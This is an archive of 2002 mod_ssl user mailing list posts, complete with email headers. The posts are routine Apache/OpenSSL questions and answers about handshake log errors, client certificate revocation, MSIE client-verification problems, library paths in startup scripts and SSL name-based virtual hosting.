If you have any queries or complaints, please forward this email to complaints@culver-tec.com
***********************************************************************************************************
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 31 23:49:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA01245; Thu, 31 Oct 2002 23:48:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from viefep15-int.chello.at id XAA01238; Thu, 31 Oct 2002 23:47:08 +0100 (MET)
Received: from apollo ([195.34.150.153]) by viefep15-int.chello.at
          (InterMail vM.5.01.05.12 201-253-122-126-112-20020820) with SMTP
          id <20021031224704.EQZM9517.viefep15-int.chello.at@apollo>
          for ; Thu, 31 Oct 2002 23:47:04 +0100
Message-ID: <004a01c2812f$6da79360$01000001@apollo>
From: "C. Votruba" 
To: 
Subject: Problem with mod_ssl
Date: Thu, 31 Oct 2002 23:47:02 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C. Votruba" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I have one problem with mod_ssl (perhaps), using Apache 1.3.27/mod_ssl
2.8.11/OpenSSL 0.9.6g.

I have found the following in my ssl_engine log, after that "attack" Apache
stops to fulfill requests for approx. 1-2 minutes. Regarding some advices
against the slapper.worm I also have disabled SSLv2:

[30/Oct/2002 08:00:35 07895] [info]  Connection to child 98 established
(server alpha.xxxxx.com:443, client 219.167.7.52)
[30/Oct/2002 08:00:35 07895] [info]  Seeding PRNG with 1160 bytes of entropy
[30/Oct/2002 08:00:35 07895] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[30/Oct/2002 08:00:35 07873] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[30/Oct/2002 08:00:35 07895] [info]  Connection to child 98 established
(server alpha.xxxxx.com:443, client 219.167.7.52)
[30/Oct/2002 08:00:35 07895] [info]  Seeding PRNG with 1160 bytes of entropy
[30/Oct/2002 08:00:35 07870] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[30/Oct/2002 08:00:35 07895] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[30/Oct/2002 08:00:36 07913] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]


Any ideas what I could have missed when I upgraded Apache/mod_ssl and
OpenSSL ?
Eveything was recompiled again without any errors, but the error still
exists and sometimes occur (with the same log entries as above)...

Your help is higly appreciated !


Thank you and regards

Christoph

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  2 19:42:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA12572; Sat, 2 Nov 2002 19:41:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from yin id TAA12566; Sat, 2 Nov 2002 19:40:58 +0100 (MET)
Received: by yin (Postfix, from userid 1000)
	id C66981FFA2; Sat,  2 Nov 2002 13:40:57 -0500 (EST)
Received: from localhost (localhost [127.0.0.1])
	by yin (Postfix) with ESMTP id C36031FF9E
	for ; Sat,  2 Nov 2002 13:40:57 -0500 (EST)
Date: Sat, 2 Nov 2002 13:40:57 -0500 (EST)
From: "Kyle O'Donnell" 
To: modssl-users@modssl.org
Subject: Client/Server Authentication.
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kyle O'Donnell" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All,

I am trying to setup my web server to authenticate clients through ssl 
certs.  Thus far I have been able to successfully do so via creating 
client pkcs12 files sending them to a client and importing into browser.  
What I have not been able to figure out, is how to revoke a client's 
certificate.  We are looking at implimenting WebDev for our developers 
where both htaccess and ssl is aimed to be used.  However, we do need to 
have the ability to revoke their access, and I have yet to find a way to 
revoke only 1 clients ssl access.  If anyone can help out or point me in 
the right direction, it would be much appreciated.

Regards,
Kyle O'Donnell








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  3 11:40:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA03507; Sun, 3 Nov 2002 11:39:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id LAA03503; Sun, 3 Nov 2002 11:38:38 +0100 (MET)
Received: from localhost ([127.0.0.1] helo=it0033.it-action.com)
	by mx02.itaction.net with esmtp (Exim 4.05)
	id 188I9J-0004M5-00
	for modssl-users@modssl.org; Sun, 03 Nov 2002 10:38:33 +0000
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H4ZXK800.DAX for ; Sun, 3 Nov 2002
          10:38:32 +0000 
Message-ID: <3DC4FCA8.6020205@itaction.co.uk>
Date: Sun, 03 Nov 2002 10:38:32 +0000
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Certificate Server
References: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You certainly can. See the openssl  FAQ

http://www.openssl.org/support/faq.cgi#USER4

Miguel Angel Gomez Animas wrote:

>
>
>
> Hi all....
>
> I want to know if is possible create a server certificate with modssl, 
> something like a personal verisign or something like this...
>
> What do i have to do???, can you help me with this???
>
> Thanks a lot!!!!
>
>
> _________________________________________________________________
> Internet access plans that fit your lifestyle -- join MSN. 
> http://resourcecenter.msn.com/access/plans/default.asp
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  3 16:54:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10535; Sun, 3 Nov 2002 16:53:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp3.poczta.onet.pl id QAA10526; Sun, 3 Nov 2002 16:52:41 +0100 (MET)
Received: from [213.155.167.211] ([213.155.167.211]:11278 "HELO gepard")
	by ps3.test.onet.pl with SMTP id ;
	Sun, 3 Nov 2002 16:52:36 +0100
Message-ID: <000601c28351$079c2b20$0300a8c0@gepard>
From: "Marcin" 
To: 
Subject: IE and client verification problem
Date: 	Sun, 3 Nov 2002 16:52:32 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marcin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm experiencing weird problems with MSIE clients accessing pages on a
Apache 1.3.26+mod_ssl-2.8.9
 server (Debian Woody with current updates) with client verification turned
on.
I created and signed CA certificate, then created and signed server and
several clients' certificates.
On every client workstation, I imported the proper client certificate into
MSIE.
In Apache config I enabled mod_ssl and set "verify client required" for
Document Root directory,
and put the "magic" SetEnviF stuff (unclean-shutdown, downgrade-1.0 and so
on) as recommended in FAQ.

Everything seemed to work just fine, but users started report absence of
some pages' elements.
Further investigation showed, that for some unknown reasons, the MSIE
doesn't load all of the page
components.

I've created simply test.html:




(some more repetition of above line)


put it into DocumentRoot and requested it from the MSIE. Randomly choosen
pictures did not come up, and
MSIE showed well-known red X sign for them. Then I refreshed the page, and
some of the pictures became
visible, but the other were replaced with X sign. I restarted the browser,
then the workstation, then tried it
on another couple  of workstations with no success.

I've following statements so far:
* the problem exists in all version of MSIE I've installed:
  Win95+IE 5.5 SP2;
  Win98+IE 6.0, Win98+IE 6.0 SP1;
  WinXP+IE 6.0, WinXP+IE 6.0 SP1;
  EXCEPT W2000+IE6.0, which works just perfect
* on WinXP IE often crashed completely (kindly offering to send a report to
MS for analysis)
* I could reproduce the problem on another Debian machine, and also on
full-patched RedHat 7.0
* turning off the client verification in mod_ssl solves the problem
completely (but I can't do this)
* slowing the link (with CBQ) to as low as 64kbps also solves the problem
(got to throw away all 100Mbit cards ;)))
* inserting stunnel between MSIE and Apache, either at the Apache side
(turning of mod_ssl) or at the workstation side
(no https in MSIE) solves the problem
* and last, but not least, Mozilla and Opera works perfect (tell me why I'm
not surprised?)

Did any of you observe anything similar to this? I searched the mailing list
archive, news groups,
but found near nothing. I also tried to play with SetEnvIf directive, and
turning off the downgrade
compatibility options clearly helped some WinXP+IE 6.0 SP1 workstations, but
made things worse
on rest of them.

Thanks for your time,
--
Marcin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  4 07:16:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA00736; Mon, 4 Nov 2002 07:15:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sj-msg-core-4.cisco.com id HAA00646; Mon, 4 Nov 2002 07:14:05 +0100 (MET)
Received: from princeton.cisco.com (IDENT:mirapoint@princeton.cisco.com [64.101.71.62])
	by sj-msg-core-4.cisco.com (8.12.2/8.12.2) with ESMTP id gA46Dxot016436
	for ; Sun, 3 Nov 2002 22:13:59 -0800 (PST)
Received: from CSCOAMERA10315 (bldr1-vpn-client18.cisco.com [64.101.71.149])
	by princeton.cisco.com (Mirapoint)
	with ESMTP id AAQ04100;
	Sun, 3 Nov 2002 23:13:57 -0700 (MST)
From: "Lawrence Cole" 
To: 
Subject: RE: Startup Script
Date: Sun, 3 Nov 2002 23:13:56 -0700
Message-ID: <000201c283c9$5bf938c0$0200000a@amer.cisco.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <484A6CA492BE654395D208B1D8D5393972F6CA@SOMEXEVS001.ex.ordersx.org>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lawrence Cole" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Owen,

Both solutions work.  Thank you very much for your time and patience.


Regards,

-Lawrence



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
Sent: Thursday, October 31, 2002 1:04 AM
To: modssl-users@modssl.org
Subject: RE: Startup Script


To expand a little on my previous post:

When you run a shell-script, it forks a new shell which doesn't usually
inherit environment variables from the calling shell. So you have to set
any envs in the script. To do this under the standard shell (i.e.
/bin/sh) you need two lines:

	LD_LIBRARY_PATH="/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
	export LD_LIBRARY_PATH

Under the tcsh, you'd only need one:

	setenv LD_LIBRARY_PATH
/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

So that's how to get LD_LIBRARY_PATH to work.

However, the use of LD_LIBRARY_PATH is generally discouraged for several
reasons - it breaks encapsulation by making the execution of a binary
dependent on the shell (hence your problem), it invites namespace
problems if two libraries in different lib directories have the same
name (the binary will load the first it finds on the path), on large
projects with lots of development libs, the path can become unfeasibly
large, etc. etc.

A much cleaner solution is to define the paths when compiling. Thus the
binary carries with it the paths to just those directories it needs. To
do this, define the "CFLAGS" environment variable in the shell in which
you configure apache, i.e.

	CFLAGS="-L/lib -R/lib -L/usr/lib -R/usr/lib -L/usr/openwin/lib
-R/usr/openwin/lib"
	export CFLAGS
	./configure 

When you run make, you will find that the CFLAGS above will appear on
the compile line and the resulting binary will find its libraries from
these internal symbols.

Compiling is a bit of a black art at times and I don't really understand
all of it myself - the advices in this note are just some distillations
of my own experiences and things I found when trawling the web..

Rgds,

Owen Boyle

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 21:05
To: modssl-users@modssl.org
Subject: RE: Startup Script


Boyle,

Thank you for your suggestions.

Adding "LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
to the startup script does not help.

Sourcing root's .profile before running the "apachectl startssl" command
does not help.  The LD_LIBRARY_PATH is set in the .profile.

So the last thing to try are the -R and -L compile-time option pairs for
each library.  I have a rookie question to ask.  Where do I use these? I
can't use them with the .configure or make commands.  Do I need to edit
the Makefile?  Can you give me an example?

Regards,

Lawrence


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
Sent: Wednesday, October 30, 2002 2:21 AM
To: modssl-users@modssl.org
Subject: RE: Startup Script


Quick fix is to put in the startup script:

LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

before it tries to start apache..

Better fix is to recompile apache with the additional compile-time
options: "-L/usr/openwin/lib -R/usr/openwin/lib" etc. (one pair for each
lib). This should build the paths to the libs into the binary and then
you don't need LD_LIBRARY_PATH at all.

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 04:52
To: modssl-users@modssl.org
Subject: Startup Script


Greetings everyone,

I realize this situation has come up before, but none of the suggestions
I have seen have worked for me.

I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
creating it, and no problems starting from the command line.  I am
however, unable to start automatically at boot using a script in the
rc3.d directory.  When I try to start it automatically using:

#!/bin/sh
#
# Start SSL-Aware Apache http daemon
#
echo "Start SSL-Aware Apache httpd"
/opt/apache/bin/apachectl startssl


I get the following error:

ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
such file or directory Killed /opt/apache/bin/apachectl startssl: httpd
could not be started

Once the system is booted up the LD_LIBRARY_PATH is
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
I need to boot at startup.  Any suggestions?

Regards,

Lawrence

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  4 16:52:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA17947; Mon, 4 Nov 2002 16:51:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from indigo.quadrant.net id QAA17937; Mon, 4 Nov 2002 16:50:22 +0100 (MET)
Received: from [192.168.100.111] (gw.marketingden.com [204.83.38.101])
	by indigo.quadrant.net (8.9.1/8.9.1) with ESMTP id JAA18954
	for ; Mon, 4 Nov 2002 09:50:16 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.2.4011
Date: Mon, 04 Nov 2002 09:51:40 -0600
Subject: Re: IE and client verification problem
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: <000601c28351$079c2b20$0300a8c0@gepard>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sounds like you need to put a session cache in your apache config.


> Everything seemed to work just fine, but users started report absence of
> some pages' elements.
> Further investigation showed, that for some unknown reasons, the MSIE
> doesn't load all of the page
> components.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  4 17:30:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA19606; Mon, 4 Nov 2002 17:29:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.heuthes.pl id RAA19599; Mon, 4 Nov 2002 17:29:04 +0100 (MET)
Received: (qmail 22569 invoked by uid 0); 4 Nov 2002 16:28:58 -0000
Received: from migor@op.pl by poczta
	 by uid 65534 with qmail-scanner-1.10 (. Clear:0. Processed in 0.358735 secs); 04 Nov 2002 16:28:58 -0000
Received: from unknown (HELO gepard) (192.168.11.1)
  by 0 with SMTP; 4 Nov 2002 16:28:57 -0000
Message-ID: <000901c2841f$465603d0$0300a8c0@gepard>
From: "Marcin" 
To: 
References: 
Subject: Re: IE and client verification problem
Date: Mon, 4 Nov 2002 17:28:56 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marcin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"James Hastings-Trew"  wrote:
> Sounds like you need to put a session cache in your apache config.

Thanks for response, but I already did it (forgot to mention it). Here is
important part of my httpd.conf.


        Options Includes FollowSymLinks MultiViews ExecCGI Includes
        AllowOverride All
        SSLVerifyClient require
        SSLVerifyDepth  1
        SSLOptions +FakeBasicAuth +StrictRequire  +CompatEnvVars +StdEnvVars
        SSLRequireSSL
        SSLRequire (%{SSL_CLIENT_S_DN_O} eq "MYORG"  and
%{SSL_CIPHER_USEKEYSIZE}>=128)
        Satisfy all
        order deny,allow
        deny from all
        allow from 192.168.0.0/255.255.255.0


SSLEngine on
SSLCertificateFile /etc/apache/webserver.crt
SSLCertificateKeyFile /etc/apache/webserver.key
SSLCACertificateFile /etc/apache/ca.crt
SSLMutex sem
SSLSessionCacheTimeout 600
SSLSessionCache dbm:/tmp/ssl.cache
SetEnvIf User-Agent "MSIE" nokeepalive ssl-unclean-shutdown downgrade-1.0
force-response-1.0
SSLLog /var/log/apache/ssl.log
SSLLogLevel info

--
Marcin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 00:42:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA00941; Tue, 5 Nov 2002 00:41:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vetorialnet.com.br id AAA00932; Tue, 5 Nov 2002 00:40:16 +0100 (MET)
From: asom@vetorialnet.com.br
Received: from localhost (localhost.vetorialnet.com.br [127.0.0.1])
	by smtp.vetorialnet.com.br (Postfix) with ESMTP id BD3BD11CB42
	for ; Mon,  4 Nov 2002 20:18:48 -0200 (BRST)
Received: from localhost (vetnet8.vetorialnet.com.br [200.248.179.8])
	by smtp.vetorialnet.com.br (Postfix) with ESMTP id 8CE7B11CB2E
	for ; Mon,  4 Nov 2002 20:18:47 -0200 (BRST)
Received: from 200.248.179.17 ( [200.248.179.17])
	as user asom@vetnet1.vetorialnet.com.br by webmail.vetorialnet.com.br with HTTP;
	Mon,  4 Nov 2002 20:20:12 -0200
Message-ID: <1036448412.3dc6f29ceefa2@webmail.vetorialnet.com.br>
Date: Mon,  4 Nov 2002 20:20:12 -0200
To: modssl-users@modssl.org
Subject: Configuring Multiple Certicates SSL over an unique IP
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1 / FreeBSD-4.6
X-Originating-IP: 200.248.179.17
X-WebMail: webmail.vetorial.net
X-Virus-Scanned: by http://www.vetorialnet.com.br
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: asom@vetorialnet.com.br
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello,

 There are some way to configuring the Apache Server to utilize multiple 
certificates SSL, over an unique ip, once for each virtual domain ?

 What the Apache configure sintax ?

Alex Moraes

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 08:50:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA11186; Tue, 5 Nov 2002 08:49:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id IAA11178; Tue, 5 Nov 2002 08:49:00 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA57mxt9002383
	for ; Tue, 5 Nov 2002 08:48:59 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA57mwEm020540
	for ; Tue, 5 Nov 2002 08:48:59 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Configuring Multiple Certicates SSL over an unique IP
Date: Tue, 5 Nov 2002 08:48:58 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A4A2@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Configuring Multiple Certicates SSL over an unique IP
Thread-Index: AcKEW/LAacpLPB74SVuHTE+g3eoRlwAQ3Saw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

No. This is called name-based virtual hosting (NBVH). It works fine for
plain HTTP but is impossible under SSL.

The reason is that NBVH uses the "Host" header to find the VH. But in
SSL, the connection must be established *before* you get the Host
header. So the server cannot decide which VH to use. 

Rgds,

Owen Boyle 

-----Original Message-----
From: asom@vetorialnet.com.br [mailto:asom@vetorialnet.com.br]
Sent: Montag, 4. November 2002 23:20
To: modssl-users@modssl.org
Subject: Configuring Multiple Certicates SSL over an unique IP



Hello,

 There are some way to configuring the Apache Server to utilize multiple
certificates SSL, over an unique ip, once for each virtual domain ?

 What the Apache configure sintax ?

Alex Moraes

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 10:10:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA15091; Tue, 5 Nov 2002 10:09:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from maillink.ch id KAA15077; Tue, 5 Nov 2002 10:08:09 +0100 (MET)
From: ueli@heuer.org
Received: (qmail 14101 invoked by uid 64014); 5 Nov 2002 09:08:08 -0000
Received: from ueli@heuer.org by largo by uid 600 with qmail-scanner-1.15 
 (clamscan: 0.51. spamassassin: 2.43.  Clear:. 
 Processed in 0.522749 secs); 05 Nov 2002 09:08:08 -0000
Received: from deadeye.maillink.ch (ueli@heuer.org@2001:8a8:30:11::2)
  by 0 with SMTP; 5 Nov 2002 09:08:07 -0000
Date: Tue, 5 Nov 2002 10:08:07 +0100
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP
Message-Id: <20021105100807.629af08b.ueli@heuer.org>
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A4A2@SOMEXEVS001.ex.ordersx.org>
References: <484A6CA492BE654395D208B1D8D5393973A4A2@SOMEXEVS001.ex.ordersx.org>
Organization: none 
X-Mailer: Sylpheed version 0.8.5claws56 (GTK+ 1.2.10; )
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ueli@heuer.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 5 Nov 2002 08:48:58 +0100
"Boyle Owen"  wrote:

> No. This is called name-based virtual hosting (NBVH). It works fine for
> plain HTTP but is impossible under SSL.
> 
> The reason is that NBVH uses the "Host" header to find the VH. But in
> SSL, the connection must be established *before* you get the Host
> header. So the server cannot decide which VH to use. 

except you are using a star-certificate, 

if your certificate is *.foo.bar you can use name-based virtual hosting for
following dhosts:

www.foo.bar
test.foo.bar 
new.foo.bar
...
what-ever.foo.bar


> 
> Rgds,
> 
> Owen Boyle 
> 
> -----Original Message-----
> From: asom@vetorialnet.com.br [mailto:asom@vetorialnet.com.br]
> Sent: Montag, 4. November 2002 23:20
> To: modssl-users@modssl.org
> Subject: Configuring Multiple Certicates SSL over an unique IP
> 
> 
> 
> Hello,
> 
>  There are some way to configuring the Apache Server to utilize multiple
> certificates SSL, over an unique ip, once for each virtual domain ?
> 
>  What the Apache configure sintax ?
> 
> Alex Moraes
> 
-- 
"The software said it requires Windows 95 or better,
                                                 so I installed Linux"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 11:23:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA17625; Tue, 5 Nov 2002 11:22:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id LAA17617; Tue, 5 Nov 2002 11:21:53 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
